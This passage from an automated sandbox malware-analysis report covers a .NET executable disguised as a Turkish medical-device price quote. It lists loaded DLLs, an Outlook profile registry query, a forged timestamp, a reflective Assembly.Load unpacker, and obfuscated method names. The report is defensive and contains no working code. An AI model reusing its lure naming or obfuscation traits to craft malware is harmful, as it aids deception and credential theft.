                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: cOXk.pdbSHA256 source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: Binary string: cOXk.pdb source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, PorFhk6DERu52uuEWI.cs.Net Code: FA6d9YOeUp System.Reflection.Assembly.Load(byte[])
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, PorFhk6DERu52uuEWI.cs.Net Code: FA6d9YOeUp System.Reflection.Assembly.Load(byte[])
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, PorFhk6DERu52uuEWI.cs.Net Code: FA6d9YOeUp System.Reflection.Assembly.Load(byte[])
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: 0xD3CDE623 [Sun Aug 9 07:32:51 2082 UTC]
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_028407B3 push edi; retf 0000h6_2_028407CA
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_028407E5 push edi; retf 0000h6_2_028407EA
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0284891E pushad ; iretd 6_2_0284891F
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02848C2F pushfd ; iretd 6_2_02848C30
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_02848DDF push esp; iretd 6_2_02848DE0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06741099 push es; ret 6_2_06741090
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06741080 push es; ret 6_2_06741090
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0674BC96 pushad ; ret 6_2_0674BC99
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06741978 push es; iretd 6_2_06741984
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06741942 push es; iretd 6_2_06741984
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: section name: .text entropy: 7.614195222947558
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, gmidj2cNCL2wet5hXQ.csHigh entropy of concatenated method names: 'ToString', 'pJftUUWn83', 'NYUtik1r0d', 'XoctCFLD2I', 'qV0t7PkCHw', 'tT0taxu3J2', 'gf0tpvvYZQ', 'h2Et4BSuUA', 'yNntL9WV0u', 'vjFtYeIv4x'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, NRxhwSPTNvsPRBrkqd.csHigh entropy of concatenated method names: 'ixLMRIG1hf', 'UQPMs0jtb0', 'njqMOXGah6', 'rwlMExyISr', 'AfeM6iO9Uc', 'klLOVhhWRw', 'lfiOxuI2IU', 'dtSONLBdWe', 'ltEOmIVuJo', 'N4OOFPIT7u'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, f5ePyPvdH5p24GQJZdb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RbFlqhuSTy', 'rs9l5UYCxi', 'veulX8XjP9', 'ySAlluETLe', 'WGulyK5xqi', 'i5ilrs04df', 'q6dlj0N8V0'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, nk8Xhvzxtd3d4u6euy.csHigh entropy of concatenated method names: 'pDo5nFg5Gr', 'fua5Gu3qEm', 'jbq5DE1M94', 'yWs5PieAsX', 'die5i2ZlE8', 'z0O57YkDUx', 'TyJ5awNKJl', 'egV5jHUVtD', 'M3A52yVeVS', 'ppm5kmZcVt'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, v8g6ZddC3lCTjYc3iv.csHigh entropy of concatenated method names: 'IYvvE8dtrg', 'X05v6KjZYh', 'Ax9vBiHKhu', 'TDCvQ0ODXj', 'h4EvoVXKRx', 'kwSvtTNvsP', 'viq9NgrwehF6HQPseP', 'Uwhw65LEq3GoYMOs5n', 'O3ZvvGu9nW', 'VFxvJPCQHm'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, uf2GKwx57yso2wIqxE.csHigh entropy of concatenated method names: 'IOQTmE4xXD', 'lKjT1SfBfb', 'e9Pfu1i0TV', 'l8Zfv0sykl', 'cFLTUyUyTg', 'tFGTHLvEuE', 'rD5Tw5Mcp9', 'tbOTW7GjIY', 'Ox1T08cRny', 'd5nTc8ujKq'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, vkBeaHsThZnGCCZ3M0.csHigh entropy of concatenated method names: 'Dispose', 'aHFvFYXbKM', 'o6CbieYSZu', 'PBOVfvuUYO', 'Tc6v1B9k2v', 'rrVvzyodwx', 'ProcessDialogKey', 'zc6buZ0OK0', 'RxIbvuZFXU', 'pPrbb3BigB'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, qpvGeyefD9uob6j8fe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EfRbF9frDV', 'iJSb1s1Aus', 'hXRbzJ1v3u', 'PdJJubyJuK', 'uRvJvYbXQp', 'e4gJbQvILH', 'mC5JJnAe0Q', 'sbesopUAsnY981Z7NTH'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, zN9WbEWhYZSyfwf2kO.csHigh entropy of concatenated method names: 'YxDoKf2vjr', 'mwtoH2SMbj', 'u86oWvgdFc', 'XTOo0iRZa9', 'SP2oiKfCxo', 'KxwoChNTpj', 'WGso7n1pn4', 'ySEoagwWN4', 'rPKopLHlxZ', 'TR4o4mVtf6'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, soRjZtNfAuHFYXbKMA.csHigh entropy of concatenated method names: 'xMkqo7Oyr2', 'JOdqTCQHX6', 'C4DqqilJAA', 'VPUqXm2eIF', 'sPhqyLGqFa', 'TC2qjd7N5l', 'Dispose', 'BqlfIntFFB', 'Q78fsPOkjB', 'MKyfeqGZHI'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, Qk7c4ZvvgTtspakYRdS.csHigh entropy of concatenated method names: 'K3551vpyBm', 'Pb45zQoH4J', 'mryXu4MEyp', 'MlcXvyNb3D', 'AiSXbLciB5', 'OsMXJ7kIkF', 'O3aXdfIUiR', 'kRxXRhVyqf', 'KQ7XI0Olla', 'XarXstOBkn'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, giyDf1wQ6NPrLyf3ny.csHigh entropy of concatenated method names: 'NEN8GpsGKt', 'udx8D2pYFJ', 'Mku8PgNAMg', 'okA8ilm1Rt', 'K9I87VrXbg', 'Ejg8aqNnr5', 'bIg84Z6RKa', 'pUf8LfOPVh', 'u0v8KPtsEn', 'pWF8U5KAFW'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, wBF35XAx0Xsv5T3FxK.csHigh entropy of concatenated method names: 'cPQTBraDbq', 'FMMTQYy3tk', 'ToString', 'yCKTIyxWWY', 'CMnTsdQitK', 'eexTeHKYqk', 'PioTOuVbrj', 'yq0TMN3QsE', 'EikTEik0Ed', 'WE3T6OX0xZ'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, aHcmq3Dx9iHKhucDC0.csHigh entropy of concatenated method names: 'prme3lWrp9', 'CGxenFvOxW', 'LqDeGMrBkX', 'urNeDAn8s2', 'KlaeoCUWxr', 'O8uetpRiEC', 'OLSeTvii2B', 'QGXefupPWQ', 'LmteqOVmx8', 'eAce5bn2eN'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, eyFoomvJ8JH2v5qQETX.csHigh entropy of concatenated method names: 'bvyX1fEGnG', 'KQvXzF0GJT', 'xNeluBr4pO', 'hsd3poR0NM7ZLFvl6G4', 'OY77rIRTOtK9fn7JST5', 'a8PYivRcARmH5QTlbxl', 'yglqwvRrCAYrCtvh7EE'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, PorFhk6DERu52uuEWI.csHigh entropy of concatenated method names: 'UJGJRZOGfl', 'ODPJIsnent', 'FtIJsls3S2', 'OZhJeh3gW2', 'ay5JOjhtdG', 'f5KJMtUb8v', 'ooHJEpGERP', 'zw6J6B58oD', 'xuRJhBIBDa', 'GZGJBfEE3J'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, kZ0OK0FWxIuZFXUtPr.csHigh entropy of concatenated method names: 'FsmqPTZ68L', 'Unmqin8g5V', 'mJmqC3HyZp', 'FdEq7HoKue', 'IyXqantoW5', 'YEbqp6eDaa', 'WBpq4sAnOJ', 'c07qL5PDXY', 'Gq0qYecNSC', 'xAgqKfkMPx'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, amUl0DYCqqPfJvXpQ6.csHigh entropy of concatenated method names: 'N8QE2ws8HJ', 'IcSEkC1nCE', 'MdaE9dVE03', 'WOCE3UyNpJ', 'SBYEgn0e12', 'YShEnlWCTZ', 'V1EEZIJGll', 'BO2EGeZ66K', 'FqcEDeayfO', 'N3SESehvQv'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, b8dtrgGm05KjZYhK3t.csHigh entropy of concatenated method names: 'WuHsWxioJ2', 'eZis0E1gn2', 'Ra7sc7wCUS', 'OWCsAE3KcV', 'bfFsVbfv87', 'v4Qsx3bAeb', 'PyLsN2Jcem', 'DdFsms6aGi', 'HT3sFcdUE0', 'wNCs1jy4Mg'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, JnLjBTbuhrmD7xf9Qp.csHigh entropy of concatenated method names: 'MOG9REmvw', 'NPx3weG7a', 'cO7nEae08', 'UnrZXjwGy', 'JYpDBhvBw', 'p0ZSAJA9h', 'eFDM0xacrZ1IVyoO8Z', 'lNFFXP38UEur561ImS', 'NxjfXOOfA', 'jRj5hFntT'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, iBEpXl4L3R0sGfJyZV.csHigh entropy of concatenated method names: 'M4WEI2AYQn', 'KKmEeGOMAV', 'rwXEMjlRVX', 'wkcM12V7XB', 'vW8Mzav90w', 'colEufEbb1', 'dpuEvNI1TX', 'EAjEbBLeZX', 'HqeEJG8aJI', 'clOEdc0bNO'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, gmidj2cNCL2wet5hXQ.csHigh entropy of concatenated method names: 'ToString', 'pJftUUWn83', 'NYUtik1r0d', 'XoctCFLD2I', 'qV0t7PkCHw', 'tT0taxu3J2', 'gf0tpvvYZQ', 'h2Et4BSuUA', 'yNntL9WV0u', 'vjFtYeIv4x'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, NRxhwSPTNvsPRBrkqd.csHigh entropy of concatenated method names: 'ixLMRIG1hf', 'UQPMs0jtb0', 'njqMOXGah6', 'rwlMExyISr', 'AfeM6iO9Uc', 'klLOVhhWRw', 'lfiOxuI2IU', 'dtSONLBdWe', 'ltEOmIVuJo', 'N4OOFPIT7u'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, f5ePyPvdH5p24GQJZdb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RbFlqhuSTy', 'rs9l5UYCxi', 'veulX8XjP9', 'ySAlluETLe', 'WGulyK5xqi', 'i5ilrs04df', 'q6dlj0N8V0'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, nk8Xhvzxtd3d4u6euy.csHigh entropy of concatenated method names: 'pDo5nFg5Gr', 'fua5Gu3qEm', 'jbq5DE1M94', 'yWs5PieAsX', 'die5i2ZlE8', 'z0O57YkDUx', 'TyJ5awNKJl', 'egV5jHUVtD', 'M3A52yVeVS', 'ppm5kmZcVt'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, v8g6ZddC3lCTjYc3iv.csHigh entropy of concatenated method names: 'IYvvE8dtrg', 'X05v6KjZYh', 'Ax9vBiHKhu', 'TDCvQ0ODXj', 'h4EvoVXKRx', 'kwSvtTNvsP', 'viq9NgrwehF6HQPseP', 'Uwhw65LEq3GoYMOs5n', 'O3ZvvGu9nW', 'VFxvJPCQHm'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, uf2GKwx57yso2wIqxE.csHigh entropy of concatenated method names: 'IOQTmE4xXD', 'lKjT1SfBfb', 'e9Pfu1i0TV', 'l8Zfv0sykl', 'cFLTUyUyTg', 'tFGTHLvEuE', 'rD5Tw5Mcp9', 'tbOTW7GjIY', 'Ox1T08cRny', 'd5nTc8ujKq'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, vkBeaHsThZnGCCZ3M0.csHigh entropy of concatenated method names: 'Dispose', 'aHFvFYXbKM', 'o6CbieYSZu', 'PBOVfvuUYO', 'Tc6v1B9k2v', 'rrVvzyodwx', 'ProcessDialogKey', 'zc6buZ0OK0', 'RxIbvuZFXU', 'pPrbb3BigB'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, qpvGeyefD9uob6j8fe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EfRbF9frDV', 'iJSb1s1Aus', 'hXRbzJ1v3u', 'PdJJubyJuK', 'uRvJvYbXQp', 'e4gJbQvILH', 'mC5JJnAe0Q', 'sbesopUAsnY981Z7NTH'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, zN9WbEWhYZSyfwf2kO.csHigh entropy of concatenated method names: 'YxDoKf2vjr', 'mwtoH2SMbj', 'u86oWvgdFc', 'XTOo0iRZa9', 'SP2oiKfCxo', 'KxwoChNTpj', 'WGso7n1pn4', 'ySEoagwWN4', 'rPKopLHlxZ', 'TR4o4mVtf6'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, soRjZtNfAuHFYXbKMA.csHigh entropy of concatenated method names: 'xMkqo7Oyr2', 'JOdqTCQHX6', 'C4DqqilJAA', 'VPUqXm2eIF', 'sPhqyLGqFa', 'TC2qjd7N5l', 'Dispose', 'BqlfIntFFB', 'Q78fsPOkjB', 'MKyfeqGZHI'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, Qk7c4ZvvgTtspakYRdS.csHigh entropy of concatenated method names: 'K3551vpyBm', 'Pb45zQoH4J', 'mryXu4MEyp', 'MlcXvyNb3D', 'AiSXbLciB5', 'OsMXJ7kIkF', 'O3aXdfIUiR', 'kRxXRhVyqf', 'KQ7XI0Olla', 'XarXstOBkn'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, giyDf1wQ6NPrLyf3ny.csHigh entropy of concatenated method names: 'NEN8GpsGKt', 'udx8D2pYFJ', 'Mku8PgNAMg', 'okA8ilm1Rt', 'K9I87VrXbg', 'Ejg8aqNnr5', 'bIg84Z6RKa', 'pUf8LfOPVh', 'u0v8KPtsEn', 'pWF8U5KAFW'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, wBF35XAx0Xsv5T3FxK.csHigh entropy of concatenated method names: 'cPQTBraDbq', 'FMMTQYy3tk', 'ToString', 'yCKTIyxWWY', 'CMnTsdQitK', 'eexTeHKYqk', 'PioTOuVbrj', 'yq0TMN3QsE', 'EikTEik0Ed', 'WE3T6OX0xZ'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, aHcmq3Dx9iHKhucDC0.csHigh entropy of concatenated method names: 'prme3lWrp9', 'CGxenFvOxW', 'LqDeGMrBkX', 'urNeDAn8s2', 'KlaeoCUWxr', 'O8uetpRiEC', 'OLSeTvii2B', 'QGXefupPWQ', 'LmteqOVmx8', 'eAce5bn2eN'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, eyFoomvJ8JH2v5qQETX.csHigh entropy of concatenated method names: 'bvyX1fEGnG', 'KQvXzF0GJT', 'xNeluBr4pO', 'hsd3poR0NM7ZLFvl6G4', 'OY77rIRTOtK9fn7JST5', 'a8PYivRcARmH5QTlbxl', 'yglqwvRrCAYrCtvh7EE'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, PorFhk6DERu52uuEWI.csHigh entropy of concatenated method names: 'UJGJRZOGfl', 'ODPJIsnent', 'FtIJsls3S2', 'OZhJeh3gW2', 'ay5JOjhtdG', 'f5KJMtUb8v', 'ooHJEpGERP', 'zw6J6B58oD', 'xuRJhBIBDa', 'GZGJBfEE3J'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, kZ0OK0FWxIuZFXUtPr.csHigh entropy of concatenated method names: 'FsmqPTZ68L', 'Unmqin8g5V', 'mJmqC3HyZp', 'FdEq7HoKue', 'IyXqantoW5', 'YEbqp6eDaa', 'WBpq4sAnOJ', 'c07qL5PDXY', 'Gq0qYecNSC', 'xAgqKfkMPx'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, amUl0DYCqqPfJvXpQ6.csHigh entropy of concatenated method names: 'N8QE2ws8HJ', 'IcSEkC1nCE', 'MdaE9dVE03', 'WOCE3UyNpJ', 'SBYEgn0e12', 'YShEnlWCTZ', 'V1EEZIJGll', 'BO2EGeZ66K', 'FqcEDeayfO', 'N3SESehvQv'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, b8dtrgGm05KjZYhK3t.csHigh entropy of concatenated method names: 'WuHsWxioJ2', 'eZis0E1gn2', 'Ra7sc7wCUS', 'OWCsAE3KcV', 'bfFsVbfv87', 'v4Qsx3bAeb', 'PyLsN2Jcem', 'DdFsms6aGi', 'HT3sFcdUE0', 'wNCs1jy4Mg'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, JnLjBTbuhrmD7xf9Qp.csHigh entropy of concatenated method names: 'MOG9REmvw', 'NPx3weG7a', 'cO7nEae08', 'UnrZXjwGy', 'JYpDBhvBw', 'p0ZSAJA9h', 'eFDM0xacrZ1IVyoO8Z', 'lNFFXP38UEur561ImS', 'NxjfXOOfA', 'jRj5hFntT'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, iBEpXl4L3R0sGfJyZV.csHigh entropy of concatenated method names: 'M4WEI2AYQn', 'KKmEeGOMAV', 'rwXEMjlRVX', 'wkcM12V7XB', 'vW8Mzav90w', 'colEufEbb1', 'dpuEvNI1TX', 'EAjEbBLeZX', 'HqeEJG8aJI', 'clOEdc0bNO'
